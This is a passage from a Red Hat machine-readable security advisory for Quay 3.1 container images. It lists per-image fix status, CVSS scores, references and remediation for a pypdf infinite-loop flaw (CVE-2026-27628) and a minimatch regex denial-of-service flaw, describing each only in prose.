"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability"
},
{
"cve": "CVE-2026-27628",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-02-25T04:02:09.864561+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442543"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in pypdf. Processing a specially crafted PDF document, specifically with circular /Prev references in the cross-reference (xref) chain, can cause an infinite loop and a high consumption of CPU, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pypdf: possible infinite loop when loading circular /Prev entries in cross-reference streams",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to supply a crafted PDF file to be processed by an application using the pypdf library. This issue can cause the application to enter an infinite loop and consume a high amount of CPU resources, eventually resulting in a denial of service with no other security impact. Due to these reasons, this vulnerability has been rated with a moderate impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27628"
},
{
"category": "external",
"summary": "RHBZ#2442543",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442543"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27628",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27628"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27628",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27628"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/commit/0fbd95938724ad2d72688d4112207c0590f0483f",
"url": "https://github.com/py-pdf/pypdf/commit/0fbd95938724ad2d72688d4112207c0590f0483f"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/issues/3654",
"url": "https://github.com/py-pdf/pypdf/issues/3654"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-2rw7-x74f-jg35",
"url": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-2rw7-x74f-jg35"
}
],
"release_date": "2026-02-25T02:45:37.543000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "pypdf: possible infinite loop when loading circular /Prev entries in cross-reference streams"
},
{
"cve": "CVE-2026-27904",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-26T02:01:23.004531+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442922"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
